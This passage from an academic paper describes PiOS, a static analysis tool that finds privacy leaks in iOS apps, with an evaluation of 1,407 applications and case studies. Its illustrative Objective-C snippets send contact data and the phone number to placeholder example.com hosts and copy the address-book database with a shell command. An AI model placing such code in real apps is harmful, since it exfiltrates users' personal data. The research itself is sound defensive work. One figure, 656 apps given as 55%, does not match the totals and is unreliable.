Interestingly, the way in which iOS implements and handles user interactions implicitly disrupts control flow in the CFG. More precisely, user interface events are reported to the application by sending messages to delegate objects that contain the code to react to these events. These messages are not generated from code the developer wrote, and thus, there is no corresponding edge in our CFG. As a result, when there is a user interaction between the point where a source is accessed and the point where data is transmitted via a sink, there will never be a path in our CFG. Thus, all paths from sensitive sources to sinks represent potential privacy leaks. Of course, a path from a source to a sink does not necessarily mean that there is an actual data flow. Hence, we perform additional data flow analysis along an interesting path and attempt to confirm that sensitive information is actually leaked.
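A bounded depth-first search is enough to enumerate such paths. The following Python sketch performs this search on a toy CFG whose nodes stand for basic blocks; the node names and the example source and sink are invented, but the 100-block limit matches the bound stated above.

MAX_PATH_LEN = 100  # maximum path length in basic blocks, as used by PiOS

cfg = {  # basic block -> successor basic blocks (toy example)
    "read_device_id": ["format_request"],
    "format_request": ["send_request", "log_locally"],
    "send_request":   [],
    "log_locally":    [],
}
sources = {"read_device_id"}
sinks = {"send_request"}

def find_paths(cfg, source, sinks, max_len=MAX_PATH_LEN):
    paths, stack = [], [[source]]
    while stack:
        path = stack.pop()
        node = path[-1]
        if node in sinks and len(path) > 1:
            paths.append(path)          # candidate privacy leak: source reaches sink
            continue
        if len(path) >= max_len:
            continue
        for succ in cfg.get(node, []):
            if succ not in path:        # do not revisit a block on the same path
                stack.append(path + [succ])
    return paths

for src in sources:
    for path in find_paths(cfg, src, sinks):
        print(" -> ".join(path))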
5.1 Sources and Sinks
In this section, we discuss in more detail how we identify sources of sensitive data and sinks that could leak this data.

Sources. Sources of sensitive information cover many aspects of the iOS environment. Table 1 enumerates the resources that we consider sensitive. As mentioned previously, this list is based on [17], where Seriot presents a comprehensive list of potentially sensitive information that can be accessed by iOS applications.

- Access to the address book
- Current GPS coordinates of the device
- Unique Device ID
- Photo Gallery
- Email account information
- WiFi connection information
- Phone-related information (phone number, last called, etc.)
- YouTube application (watched videos and recent searches)
- MobileSafari settings and history
- Keyboard cache

Table 1. Sensitive information sources.
Any iOS application has full read and write access to the address book stored on the device. Access is provided through the ABAddressBook API. Thus, whenever an application performs the initial ABAddressBookCreate call, we mark this call instruction as a source.

An application can only access current GPS coordinates if the user has explicitly granted the application permission to do so. This is enforced by the API, which displays a dialog to the user the first time an application attempts to access the CoreLocation functionality. If access is granted, the application can install a delegate with the CoreLocation framework that is notified whenever the location is updated by the system. More precisely, the CoreLocation framework will invoke the locationManager:didUpdateToLocation:fromLocation: method of the object that is passed to the CLLocationManager:setDelegate method whenever the location is updated.

A unique identifier for the iOS device executing the application is available to all applications through the UIDevice uniqueIdentifier method. This ID is represented as a string of 40 hexadecimal characters that uniquely identifies the device.

The keyboard cache is a local file accessible to all applications. This file contains all words that have been typed on the device. The only exceptions are characters typed into text fields marked to contain passwords.

Furthermore, there exist various property files that provide access to different pieces of sensitive information. The commcenter property file contains SIM card serial numbers and IMSI identifiers. The user's phone number can be accessed by querying the standardUserDefaults properties. Email account settings are accessible through the accountsettings properties file. Similar files exist that contain the history of the YouTube and MobileSafari applications, as well as recent search terms used in these applications. The wifi properties file contains the names of wireless networks the device was connected to. Also, a time stamp that logs the last time each connection was active is stored. Accesses related to these properties are all considered sensitive sources by PiOS.
Sinks. We consider sinks as operations that can transmit information over the network, in particular, methods of the NSURLConnection class. However, there are also methods in other classes that might result in network requests, and hence, could be used to leak data. For example, the method initWithContentsOfURL of the NSString class accepts a URL as parameter, fetches the content at that URL, and initializes the string object with this data. To find functions that could leak information, we carefully went through the API documentation. In total, we included 14 sinks.
5.2 Dataflow Analysis
Reachability analysis can only determine that there exists a path in the CFG that connects a source of sensitive information to a sink that performs networking operations. However, these two operations might be unrelated. Thus, to enhance the precision of PiOS, we perform an additional data flow analysis on the paths that the reachability analysis reports. That is, for every path that connects a source and a sink in the CFG, we track the propagation of the information accessed at the source node. If this data reaches one or more method parameters at the sink node, we can confirm a leak of sensitive information, and an alert is raised.

We use a standard data flow analysis that uses forward propagation along the instructions in each path that we have identified. For methods whose implementation (body) is not available in the binary (e.g., external methods such as initWithString of the NSMutableString class), we conservatively assume that the return value of this function is tainted when one or more of the arguments are tainted.
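The Python sketch below illustrates this forward propagation along a single source-to-sink path. The path representation and the operation names (read_unique_device_id, send_over_network, and so on) are invented stand-ins for resolved call sites; the conservative rule for external methods is the one described above.

path = [  # (result variable, resolved operation, argument variables)
    ("uid",  "read_unique_device_id", []),           # source: e.g., the device ID
    ("body", "build_request_body", ["fmt", "uid"]),  # external method, vararg-style
    ("req",  "build_http_request", ["body"]),
    (None,   "send_over_network", ["req"]),          # sink: network transmission
]

def confirms_leak(path, source_ops, sink_ops):
    tainted = set()
    for result, op, args in path:
        if op in source_ops:
            tainted.add(result)          # data read at the source becomes tainted
        elif any(arg in tainted for arg in args):
            # Conservative rule: if any argument is tainted, the result is tainted;
            # if the tainted call is a sink, the leak is confirmed.
            if op in sink_ops:
                return True
            if result is not None:
                tainted.add(result)
    return False

print(confirms_leak(path,
                    source_ops={"read_unique_device_id"},
                    sink_ops={"send_over_network"}))  # True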
Methods with variable number of arguments. To determine whether the output of an external function should be tainted, we need to inspect all input arguments. This makes functions with a variable number of arguments a little more tricky to handle. The two major types of such functions are string manipulation functions that use a format string (e.g., NSMutableString appendStringWithFormat), and initialization functions for aggregate types that fetch the objects to be placed in the aggregate from the stack (e.g., NSDictionary initWithObjects:andKeys). Ignoring these functions is not a good option, especially because string manipulation routines are frequently used for processing sensitive data.

For string methods that use format strings, PiOS attempts to determine the concrete value (content) of the format string. If the value can be resolved statically, the number of arguments for this call is determined by counting the number of formatting characters. Hence, PiOS can, during the data flow analysis, taint the output of such a function if any of its arguments is tainted.

The initialization functions fetch the contents for the aggregate from the stack until the value NULL is encountered. Thus, PiOS iteratively tries to statically resolve the values on the stack. If a value statically resolves to NULL, the number of arguments for this call can be determined. However, since it is not guaranteed that the NULL value can be determined statically, we set the upper bound for the number of parameters to 20.
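Both cases can be illustrated with a few lines of Python. The format-specifier handling below is deliberately simplified (it only distinguishes "%%" from other specifiers), and the stack values in the second example are fabricated; the upper bound of 20 is the one mentioned above.

import re

def count_format_args(fmt):
    # Count format specifiers to determine how many variable arguments the
    # call consumes; "%%" is a literal percent sign and consumes no argument.
    return len(re.findall(r"%[^%]", fmt.replace("%%", "")))

print(count_format_args("uid=%@&loc=%f,%f"))  # 3 variable arguments
print(count_format_args("100%% done"))        # 0

MAX_VARARGS = 20  # upper bound when the NULL terminator cannot be resolved

def count_vararg_objects(stack_values):
    # Resolve stack values until NULL (0) is found, bounded at MAX_VARARGS.
    for i, value in enumerate(stack_values[:MAX_VARARGS]):
        if value == 0:
            return i
    return MAX_VARARGS

print(count_vararg_objects([0x1000, 0x2000, 0x3000, 0]))  # 3 objects before NULL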
6 Evaluation
We evaluated PiOS on a body of 1,407 applications. 825 are free applications that we obtained from Apple's iTunes store. We downloaded the remaining 582 applications from the popular BigBoss [1] repository, which is installed by default with Cydia [12] during jailbreaking. Applications originating from the Cydia repositories are not encrypted. Therefore, these applications can be directly analyzed by PiOS. Applications purchased from the iTunes store, however, need to be decrypted before any binary analysis can be started. Thus, we automated the decryption approach described in Section 3.3.

Since iTunes does not support direct searches for free applications, we rely on apptrakr.com [2] to provide a continuously updated list of popular, free iOS applications. Once a new application is added to their listings, our system automatically downloads the application via iTunes and decrypts it. Subsequently, the application is analyzed with PiOS.
6.1 Resolving Calls to objc_msgSend
As part of the static analysis process, PiOS attempts to resolve all calls to the objc_msgSend dispatch function. More precisely, for each call to objc_msgSend, the system reasons about the target method (and class) that would be invoked at runtime by the dispatch routine (as described in Section 4.2). This is necessary to build the program's control flow graph.

During the course of evaluating PiOS on 1,407 applications, we identified 4,156,612 calls to the message dispatch function. PiOS was able to identify the corresponding class and method for 3,408,421 call sites (82%). Note that PiOS reports success only if the inferred class exists in the class hierarchy, and the selector denotes a method that is implemented by the class, or its ancestors in the hierarchy. These results indicate that a significant portion of the CFGs can be successfully reconstructed, despite the binary analysis challenges.
6.2 Advertisement and Tracking Libraries
PiOS resolves all calls to the objc_msgSend function regardless of whether the target method in the binary was written by the application developer herself, or whether it is part of a third-party library that was statically linked against the application. In an early stage of our experiments, we realized that many applications contained one (or even multiple instances) of a few popular libraries. Moreover, all these libraries triggered PiOS's privacy leak detection because the system detected paths over which the unique device ID was transmitted to third parties.

A closer examination revealed that most of these libraries are used to display advertisements to users. As many iOS applications include advertisements to create a stream of revenue for the developer, their popularity was not surprising. However, the fact that all these libraries also leak the device IDs of users that install their applications was less expected. Moreover, we also found tracking libraries, whose sole purpose is to collect and compile statistics on application users and usage. Clearly, these libraries send the device ID as a part of their functionality.
Applications that leak device IDs are indeed pervasive, and we found that 656 (or 55%) of all applications in our evaluation data set include either advertisement or tracking libraries. Some applications even include multiple different libraries at once. In fact, these libraries were so frequent that we decided to white-list them, in the sense that it was of no use for PiOS to constantly re-analyze and reconfirm their data flows. More precisely, whenever a path starts from a sensitive source in a white-listed library, further analysis is skipped for this path. Thus, the analysis results that we report in the subsequent sections only cover the code that was actually written by application developers. For completeness, Table 2 shows how frequently our white-list triggered for different applications.
Library Name   Type                  # apps using   # white-listed
AdMob          Advertising           538            55,477
Pinchmedia     Statistics/Tracking   79             2,038
Flurry         Statistics/Tracking   51             386
Mobclix        Advertising           49             1,445
AdWhirl        Advertising           14             319
QWAdView       Advertising           14             219
OMApp          Statistics/Tracking   10             658
ArRoller       Advertising           8              734
AdRollo        Advertising           7              127
MMadView       Advertising           2              96
Total                                772            61,499

Table 2. Prevalence of advertising and tracking libraries.
While not directly written by an application developer, libraries that leak device IDs still pose a privacy risk to users. This is because the company that is running the advertisement or statistics service has the possibility to aggregate detailed application usage profiles. In particular, for a popular library, the advertiser could learn precisely which subset of applications (that include this library) is installed on which devices. For example, in our evaluation data set, AdMob is the most widely used library to serve advertisements. That is, 82% of the applications that rely on third-party advertising libraries include AdMob. Since each request to the third-party server includes the unique device ID and the application ID, AdMob can easily aggregate which applications are used on any given device.

Obviously, the device ID cannot immediately be linked to a particular user. However, there is always the risk that such a connection can be made by leveraging additional information. For example, AdMob was recently acquired by Google. Hence, if a user happens to have an active Google account and uses her device to access Google's services (e.g., by using GMail), it now becomes possible for Google to tie this user account to a mobile phone device. As a result, the information collected through the ad service can be used to obtain a detailed overview of who is using which applications. Similar considerations apply to many other services (such as social networks like Facebook) that have the potential to link a device ID to a user profile (assuming the user has installed the social networking application).

The aforementioned privacy risk could be mitigated by Apple if an identifier were used that is unique for the combination of application and device. That is, the device ID returned to a program should be different for each application.
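One way such an application-specific identifier could be derived is sketched below in Python. This is purely illustrative: it is not an iOS API, and the hash construction and the placeholder device and application IDs are our own.

import hashlib

def per_app_identifier(device_id, app_id):
    # Derive an identifier that differs per (device, application) pair, so that
    # different applications on the same device cannot be linked via a shared ID.
    return hashlib.sha256((device_id + ":" + app_id).encode()).hexdigest()

device_id = "0123456789abcdef0123456789abcdef01234567"  # placeholder 40-hex-digit ID
print(per_app_identifier(device_id, "com.example.someapp"))
print(per_app_identifier(device_id, "com.example.otherapp"))  # different value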
6.3 Reachability Analysis
Excluding white-listed accesses to sensitive data, PiOS checked the CFGs of the analyzed applications for the presence of paths that connect sensitive sources to sinks. This analysis resulted in a set of 205 applications that contain at least one path from a source to a sink, and hence, a potential privacy leak. Interestingly, 96 of the 656 applications that triggered the white-list also contain paths in their core application code (i.e., outside of ad or tracking libraries).

The overwhelming majority (i.e., 3,877) of the accessed sources corresponds to the unique device identifier. These accesses originate from 195 distinct applications. 36 applications access the GPS location data at 104 different program locations. Furthermore, PiOS identified 18 paths in 5 applications that start with an access to the address book. One application accesses both the MobileSafari history and the photo storage. An overview that summarizes the potential leaks is shown in Table 3.
Source          # App Store   # Cydia    Total
DeviceID        170 (21%)     25 (4%)    195 (14%)
Location        35 (4%)       1 (0.2%)   36 (3%)
Address book    4 (0.5%)      1 (0.2%)   5 (0.4%)
Phone number    1 (0.1%)      0 (0%)     1 (0.1%)
Safari history  0 (0%)        1 (0.2%)   1 (0.1%)
Photos          0 (0%)        1 (0.2%)   1 (0.1%)

Table 3. Applications accessing sensitive data.
An interesting conclusion that one can draw from looking at Table 3 is that, overall, the programs on Cydia are not more aggressive (malicious) than the applications on the App Store. This is somewhat surprising, since Cydia does not implement any vetting process.
6.4 Data Flow Analysis
For the 205 applications that were identified with possible information leaks, PiOS then performed additional analysis to attempt to confirm whether sensitive information is actually leaked. More precisely, the system enumerates all paths in the CFG between a pair of source and sink nodes whose length does not exceed 100 basic blocks. Data flow analysis is then performed on these paths until either a flow indicates that sensitive information is indeed transmitted over the network, or all paths have been analyzed (without result). Note that our analysis is not sound; that is, we might miss data flows due to code constructs that we cannot resolve statically. However, the analysis is precise, and every confirmed flow is indeed a privacy leak. This is useful when the majority of paths actually correspond to leaks, which we found to be true.

For 172 applications, the data flow analysis confirmed a flow of sensitive information to a sink. We manually analyzed the remaining 33 applications to assess whether there really is no data flow, or whether we encountered a false negative. In six applications, even after extensive, manual reverse engineering, we could not find an actual flow. In these cases, our data flow analysis produced the correct result. The remaining 27 cases were missed due to a variety of program constructs that are hard to analyze statically (recall that we operate directly on binary code). We discuss a few of the common problems below.
For six applications, the data flow analysis was unsuccessful because these applications make use of custom-written functions to store data in aggregate types. Also, PiOS does not support nested data structures such as dictionaries stored inside dictionaries.

In four cases, the initial step could not resolve all the necessary object types. For example, PiOS was only able to resolve that the invoked method (the sent message) was setValue:forHTTPHeaderField:. However, the object on which the method was called could not be determined. As a result, the analysis could not proceed.

Two applications made use of a JSON library that adds categories to many data types. For example, the NSDictionary class is extended with a method that returns the contents of this dictionary as a JSON string. To this end, the method sends each object within the dictionary a JSONRepresentation message. The flows of sensitive information were missed because PiOS does not keep track of the object types stored within aggregate data types (e.g., dictionaries).

In other cases, flows were missed due to aliased pointers (two different pointers that refer to the same object), leaks that only occur in the application's exception handler (which PiOS does not support), or a format string that was read from a configuration file.
6.5 Case Studies
When examining the results of our analysis (in Table 3), we can see that most leaks are due to applications that transmit the device ID. This is similar to the situation of the advertising and tracking libraries discussed previously. Moreover, a number of applications transmit the user's location to a third party. These cases, however, cannot be considered real privacy leaks. The reason is that iOS itself warns users (and asks for permission) whenever an application makes use of the CoreLocation functionality. Unfortunately, such warnings are not provided when other sensitive data is accessed. In the following, we discuss in more detail the few cases in which the address book, the browser history, and the photo gallery are leaked.
Address book leaks. PiOS indicated a flow of sensitive information for the Gowalla social networking application. Closer examination of the offending path showed that the application first accesses the address book and then uses the loadRequest method of the UIWebView class to launch a web request. As part of this request, the application transmits all user names and their corresponding email addresses.
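A hedged reconstruction of what such a flow can look like is sketched below; it is reduced to contact names for brevity, uses the pre-ARC (manual reference counting) APIs of the time, and the function name and URL are ours, not Gowalla's actual code.

```objc
#import <UIKit/UIKit.h>
#import <AddressBook/AddressBook.h>

// Sketch of an address-book-to-web-request flow: read all contacts and hand
// the collected data to a UIWebView request.
static void inviteFriendsViaWebView(UIWebView *webView) {
    ABAddressBookRef book = ABAddressBookCreate();                    // sensitive source
    CFArrayRef people = ABAddressBookCopyArrayOfAllPeople(book);
    NSMutableArray *names = [NSMutableArray array];
    for (CFIndex i = 0; i < CFArrayGetCount(people); i++) {
        ABRecordRef person = (ABRecordRef)CFArrayGetValueAtIndex(people, i);
        NSString *name = (NSString *)ABRecordCopyCompositeName(person);
        if (name != nil) {
            [names addObject:name];
            [name release];
        }
    }
    // The contact data becomes part of a request issued through the UIWebView.
    NSString *query = [[names componentsJoinedByString:@","]
        stringByAddingPercentEscapesUsingEncoding:NSUTF8StringEncoding];
    NSURL *url = [NSURL URLWithString:
        [@"http://api.example.com/invite?contacts=" stringByAppendingString:query]];
    [webView loadRequest:[NSURLRequest requestWithURL:url]];          // network sink
    CFRelease(people);
    CFRelease(book);
}
```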
We then attempted to manually confirm the privacy leak by installing Gowalla on an iOS device and monitoring the network traffic. The names of the methods involved in the leak, emailsAndNamesQueryString and emailsAndNamesFromAddressBook, both in the InviterViewController class, made it easy to find the corresponding actions on the user interface. In particular, the aforementioned class is responsible for inviting a user's friends to also download and use the Gowalla application. A user can choose to send invitations to her Twitter followers, Facebook friends, or simply a group of users selected from the address book. This is certainly legitimate behavior. However, before the user makes any selection, the application also transmits the address book in its entirety to the developer. This is the flow that PiOS detects.
The resulting message ("We couldn't find any friends from your Address Book who use Gowalla. Why don't you invite some below?") indicates that the developers use this information to cross-check against their user database whether any of the user's contacts already use the application. When we discovered this privacy breach, we informed Apple through the "Report a problem" link associated with this application on iTunes. Despite our detailed report, Apple's response indicated that we should discuss our privacy concerns directly with the developer.
PiOS found another leak of address book data in twittericki. This application checks all contacts in the address book to determine whether there is a picture associated with the person. If not, the application attempts to obtain a picture of this person from Facebook. While information from the address book is used to create network requests, these requests are sent to Facebook. It is not the application developers who attempt to harvest address book data.
In three other cases, the address book is also sent without a direct warning to the user before the sensitive data is transferred. However, these applications either clearly inform the user about their activity at the beginning (Facebook) or require the user to actively initiate the transfer by selecting contacts from the address book (XibGameEngine, to invite friends; FastAddContacts, to populate the send-to field when opening a mail editor). This shows that not all leaks have the same impact on a user's privacy, although in all cases, PiOS correctly recognized a sensitive data flow.
Browser history and photo gallery. Mobile-Spy offers an application called "smartphone" on the Cydia marketplace. This application is advertised as a surveillance solution to monitor children or employees. Running only on jailbroken devices, the software has direct access to SMS messages, emails, GPS coordinates, browser history, and call information. The application is designed as a daemon process running in the background, where it collects all available information and transmits it to Mobile-Spy's site. The user who installs this application can then go to the site and check the collected data.
PiOS was able to detect two flows of sensitive information in this application: the upload of the MobileSafari history and the upload of the photo gallery. However, PiOS was not able to identify the leaking of the address book, the email box, or the SMS messages. The reason in all three cases is that the application calls system with a cp command to make a local copy of the phone databases that hold this information. These copies are later opened, and their content is transferred to the Mobile-Spy service. Tracking data through the invocation of the system library call would require PiOS to understand the semantics of the passed (shell) commands. Clearly, this is outside the scope of this paper.
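The construct in question boils down to something like the following; the database path is the commonly cited location on jailbroken devices of that era and should be treated as approximate.

```objc
#include <stdlib.h>

// The data flow is hidden inside a shell command: to follow it, PiOS would have
// to parse the string passed to system() and model the semantics of cp.
static void stashAddressBookCopy(void) {
    system("cp /var/mobile/Library/AddressBook/AddressBook.sqlitedb "
           "/var/tmp/ab-copy.sqlitedb");
}
```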
Phone Number. In November 2009, Apple removed all applications developed by Storm8 due to privacy concerns. More precisely, these applications were found to access the user's phone number via the SBFormattedPhoneNumber key in the standardUserDefaults properties. Once retrieved, the phone number was then transmitted to Storm8's servers. Shortly after the ban of all their applications, Storm8 developers released revised versions that did not contain the offending behavior. This incident prompted Apple to change their vetting process, and now all applications that access this key are rejected. Thus, to validate PiOS against this known malicious behavior, we obtained a version of Vampires Live (a Storm8 application) that predates this incident and, hence, contains the offending code. PiOS correctly and precisely identified that the phone number is read on program startup and then sent to Storm8.
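The offending access pattern can be sketched as follows; the endpoint URL is a placeholder and the code is our reconstruction of the described behavior, not Storm8's source.

```objc
#import <Foundation/Foundation.h>

// Read the phone number from the user defaults and send it to a remote server.
// SBFormattedPhoneNumber is the key that Apple now rejects applications for.
static void sendPhoneNumberHome(void) {
    NSString *number = [[NSUserDefaults standardUserDefaults]
                           stringForKey:@"SBFormattedPhoneNumber"];    // sensitive source
    if (number == nil) return;
    NSString *encoded = [number stringByAddingPercentEscapesUsingEncoding:
                                    NSUTF8StringEncoding];
    NSURL *url = [NSURL URLWithString:
        [@"http://example.com/register?phone=" stringByAppendingString:encoded]];
    // Fire-and-forget request that carries the phone number off the device.
    [NSData dataWithContentsOfURL:url];                                // network sink
}
```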
6.6 Discussion
With the exception of a few bad apples, we found that a significant majority of applications respects the personal user information stored on iOS devices. While this could be taken as a sign that Apple's vetting process is successful, we found similar results for the unchecked programs that are hosted on Cydia, an unofficial repository that can only be accessed with a jailbroken phone. However, the unique device ID of the phone is treated differently, and more than half of the applications leak this information (often because of advertisement and tracking libraries that are bundled with the application). While these IDs cannot be directly linked to a user's identity, they allow third parties to profile user behavior. Moreover, there is always the risk that outside information can be used to eventually make the connection between the device ID and a user.
7 Limitations
Statically determining the receiver and selector for every call to the objc_msgSend function is not always possible. Recall that the selector is the name of a method. Typically, this value is a string stored in the __objc_selref section of the application. However, any string value can be converted to a selector, and it is possible to write programs that build selectors from string values that cannot be statically determined (e.g., a response to a network request, or a configuration value chosen by the user). This limitation applies to all static analysis approaches and is not specific to PiOS.
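The following constructed fragment illustrates why: the selector only comes into existence at run time, from a string under the user's control.

```objc
#import <Foundation/Foundation.h>

// The method to invoke is chosen by a configuration value; neither the selector
// nor, consequently, the relevant behavior of the receiver can be determined
// statically.
static void invokeConfiguredAction(id target) {
    NSString *name = [[NSUserDefaults standardUserDefaults]
                         stringForKey:@"actionSelector"];   // value chosen by the user
    if (name == nil) return;
    SEL action = NSSelectorFromString(name);
    if ([target respondsToSelector:action]) {
        [target performSelector:action];
    }
}
```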
Furthermore, aggregate types in Objective-C (e.g., NSArray, NSDictionary, ...) are not generic. That is, the types of objects in such containers cannot be specified more precisely than id (which is of type NSObject). For example, the method touchesEnded:withEvent: of the UIResponder class is called whenever the user finishes a touch interaction with the graphical user interface (e.g., clicks an element, swipes an area). This method receives as its first argument a pointer to an object of type NSSet. Although this set solely contains UITouch elements, the lack of generics support in Objective-C prevents the type information from being stored with the aggregate instance. Similarly, any object can be added to an NSArray. Thus, PiOS has to treat any value that is retrieved from an aggregate as an NSObject. Nevertheless, as described in Section 4.2.1, PiOS might still be able to reason about the type of such an object if a subsequent call to the objc_msgSend function uses a selector that is implemented by exactly one class.
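The touch-handling example can be made concrete as follows (a constructed subclass, not code from any analyzed application):

```objc
#import <UIKit/UIKit.h>

// The NSSet only ever holds UITouch objects, but that cannot be expressed in
// the type system, so each element is statically just an NSObject.
@interface SketchView : UIView
@end

@implementation SketchView
- (void)touchesEnded:(NSSet *)touches withEvent:(UIEvent *)event {
    for (id obj in touches) {
        // The cast documents the programmer's knowledge; an analyzer can recover
        // the concrete type only if a later message send uses a selector that is
        // implemented by exactly one class (Section 4.2.1).
        UITouch *touch = (UITouch *)obj;
        NSLog(@"touch ended in phase %d", (int)[touch phase]);
    }
}
@end
```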
8 Related Work
Clearly, static analysis and program slicing have been used before. Weiser [19] was the first to formalize a technique called program slicing. As outlined in Section 4.2.1, PiOS makes use of this technique to calculate program slices that define receiver and selector values at call sites to the objc_msgSend dynamic dispatch function.
Static binary analysis has also been used in the past for various purposes. Kruegel et al. [15] made use of static analysis to perform mimicry attacks on advanced intrusion detection systems that monitor system call invocations. Christodorescu and Jha [6] present a static analyzer for executables that is geared towards detecting malicious patterns in binaries, even if the content is obfuscated. Similarly, the work described by Christodorescu et al. [7] is also based on binary static analysis and identifies malicious software using a semantics-aware malware detection algorithm. However, some of the obfuscation techniques available on the x86 architecture cannot be used on ARM-based processors. The RISC architecture of ARM facilitates more robust disassembly of binaries, as instructions cannot be nested within other instructions. Furthermore, the strict memory alignment prohibits jumps into the middle of ARM instructions. Thus, disassembling ARM binaries generally produces better results than disassembling x86 binaries.
Note that while static binary analysis is already challeng-
ing in any domain, in our work, the analysis is further com-
plicated by the fact that most iOS applications are devel-
oped in Objective-C. It is not trivial to obtain a meaningful
program control flow graph for iOS applications.
In [4], Calder and Grunwald optimize the object code of C++ programs by replacing virtual function calls with direct calls if the program contains exactly one implementation that matches the signature of the virtual function. This is possible because the mangled name of a function stored in an object file contains information on the class and parameter types. PiOS uses a similar technique to resolve the type of the receiver of a message. However, PiOS only follows this approach if the type of the receiver cannot be determined by backwards slicing and constant propagation.
In another work, Dean et al. [9] present an approach that
performs class hierarchy analysis to statically resolve vir-
tual function calls and replace them with direct function
calls. In PiOS, we do not use the class hierarchy to resolve
the invoked method. However, we do use this information to
verify that the results of the backwards slicing and forward
propagation step are consistent with the class hierarchy, and
thus sensible.
PiOS is also related to existing approaches that perform static data flow analysis. Livshits and Lam [16], for example, use static taint analysis for Java bytecode to identify vulnerabilities that result from incomplete input validation (e.g., SQL injection, cross-site scripting). The main focus of Tripp et al. [18] is to make static taint analysis scale to large real-world applications. To this end, the authors introduce hybrid thin-slicing and combine it with taint analysis to analyze large web applications, even if they are based on application frameworks such as Struts or Spring. Furthermore, Pixy [14] performs inter-procedural, context-sensitive data flow analysis on PHP web applications, and also aims to identify such taint-style vulnerabilities.
There has also been some related work in the domain of mobile devices. Enck et al. [10] published TaintDroid, a system that shares a similar goal with this work, namely the analysis of privacy leaks in smartphone applications. In contrast to our system, their work targets Android applications and performs dynamic information-flow tracking to identify privacy leaks. Most Android applications are executed by the open-source Dalvik virtual machine, and the information-flow capabilities of TaintDroid were built into a modified version of this VM. iOS applications, in contrast, are compiled into native code and executed directly by the device's CPU. TaintDroid was evaluated on 30 popular Android applications. The results agree quite well with our findings. In particular, many of the advertising and statistics libraries that we identified in Section 6.2 also have corresponding Android versions. As a result, TaintDroid raised alerts when applications transmitted location data to AdMob, Mobclix, and Flurry back-end servers.
Furthermore, Enck et al. [11] present an approach named Kirin that automatically extracts the security manifest of Android applications. Before an application is installed, this manifest is evaluated against so-called logic invariants. As a result, the user is prompted for her consent to install the application only if these invariants are violated. That is, only for applications that violate a user's expectations of privacy and security is an explicit user agreement requested during installation. The concept of a security manifest provides the user with basic information on which to base the decision whether to install an application. Unfortunately, the iOS platform does not provide such amenities. To make a decision, the user can only rely on the textual description of the application and Apple's application vetting process.
Another work that focuses on Android is the formal language presented by Chaudhuri [5]. Together with operational semantics and a type system, the author created the language with the aim of describing Android applications with regard to their security properties. However, the language currently only supports Android-specific constructs. That is, the general Java constructs that make up the majority of an application's code cannot currently be represented.
To the best of our knowledge, we are the first to propose
an automated approach to perform an in-depth privacy anal-
ysis of iOS applications.
9 Conclusions
The growing popularity and sophistication of smartphones, such as the iPhone or devices based on Android, have also increased concerns about the privacy of their users. To address these concerns, smartphone OS designers have been using different security models to protect the security and privacy of users. For example, Android applications are shipped with a manifest that shows all required permissions to the user at installation time. In contrast, Apple has decided to take the burden off its iPhone users and determine, on their behalf, whether an application conforms to the predefined privacy rules. Unfortunately, Apple's vetting process is not public, and there have been cases in the past (e.g., [20]) where vetted applications were discovered to violate the privacy rules defined by Apple.
The goal of the work described in this paper is to auto-
matically analyze iOS applications and to study the threat
they pose to user data. We present a novel approach that
is able to automatically create comprehensive CFGs from
binaries compiled from Objective-C code. We can then per-
form reachability analysis on the generated CFGs and iden-
tify private data leaks. We have analyzed more than 1,400
iPhone applications. Our experiments show that most appli-
cations do not secretly leak any sensitive information that
can be attributed to a person. This is true both for vetted
applications on the App Store and those provided by Cy-
dia. However, a majority of applications leaks the device
ID, which can provide detailed information about the habits
of a user. Moreover, there is always the possibility that addi-
tional data is used to tie a device ID to a person, increasing
the privacy risks.
Acknowledgements
The research leading to these results has received
funding from the European Union Seventh Framework
Programme (FP7/2007-2013) under grant agreement no. 257007. This work has also been supported in part by
Secure Business Austria and the European Commission
through project IST-216026-WOMBAT funded under the
7th framework program. This work was also partially sup-
ported by the ONR under grant N000140911042 and by
the National Science Foundation (NSF) under grants CNS-
0845559, CNS-0905537, and CNS-0716095.
References
[1] http://thebigboss.org.
[2] AppTrakr, Complete App Store Ranking. http://
apptrakr.com/.
[3] iPhone Developer Program License Agreement.
http://www.eff.org/files/20100302_
iphone_dev_agr.pdf.
[4] B. Calder and D. Grunwald. Reducing indirect function call overhead in C++ programs. In POPL '94: Proceedings of the 21st ACM SIGPLAN-SIGACT Symposium on Principles of Programming Languages, pages 397–408, New York, NY, USA, 1994. ACM.
[5] A. Chaudhuri. Language-based security on android. In ACM
Workshop on Programming Languages and Analysis for Se-
curity (PLAS), 2009.
[6] M. Christodorescu and S. Jha. Static analysis of executables to detect malicious patterns. In SSYM'03: Proceedings of the 12th USENIX Security Symposium, pages 12–12, Berkeley, CA, USA, 2003. USENIX Association.
[7] M. Christodorescu, S. Jha, S. A. Seshia, D. Song, and R. E.
Bryant. Semantics-aware malware detection. In IEEE Sym-
posium on Security and Privacy (Oakland), 2005.
[8] A. Cohen. The iPhone Jailbreak: A Win Against
Copyright Creep. http://www.time.com/time/
nation/article/0,8599,2006956,00.html.
[9] J. Dean, D. Grove, and C. Chambers. Optimization of
object-oriented programs using static class hierarchy anal-
ysis. In European Conference on Object-Oriented Program-
ming, 1995.
[10] W. Enck, P. Gilbert, B.-G. Chun, L. P. Cox, J. Jung, P. Mc-
Daniel, and A. N. Sheth. TaintDroid: an information-flow
tracking system for realtime privacy monitoring on smart-
phones. In Proceedings of OSDI 2010, October 2010.
[11] W. Enck, M. Ongtang, and P. McDaniel. Understanding Android security. IEEE Security and Privacy, 7(1):50–57, 2009.
[12] J. Freeman. http://cydia.saurik.com/.
[13] Gartner Newsroom. Competitive Landscape: Mobile De-
vices, Worldwide, 2Q10. http://www.gartner.com/
it/page.jsp?id=1421013, 2010.
[14] N. Jovanovic, C. Kruegel, and E. Kirda. Pixy: A static anal-
ysis tool for detecting web application vulnerabilities (short
paper). In IEEE Symposium on Security and Privacy, 2006.
[15] C. Kruegel, E. Kirda, D. Mutz, W. Robertson, and G. Vigna.
Automating mimicry attacks using static binary analysis. In
14th USENIX Security Symposium, 2005.
[16] V. B. Livshits and M. S. Lam. Finding security vulnerabili-
ties in java applications with static analysis. In 14th USENIX
Security Symposium, 2005.
[17] N. Seriot. iPhone Privacy. http://www.blackhat.
com/presentations/bh-dc-10/Seriot_
Nicolas/BlackHat-DC-2010-Seriot-iPhone%
2dPrivacy-slides.pdf.
[18] O. Tripp, M. Pistoia, S. J. Fink, M. Sridharan, and O. Weis-
man. Taj: effective taint analysis of web applications. In
ACM Conference on Programming Language Design and
Implementation, 2009.
[19] M. Weiser. Program slicing. In ICSE '81: Proceedings of the 5th International Conference on Software Engineering, pages 439–449, Piscataway, NJ, USA, 1981. IEEE Press.
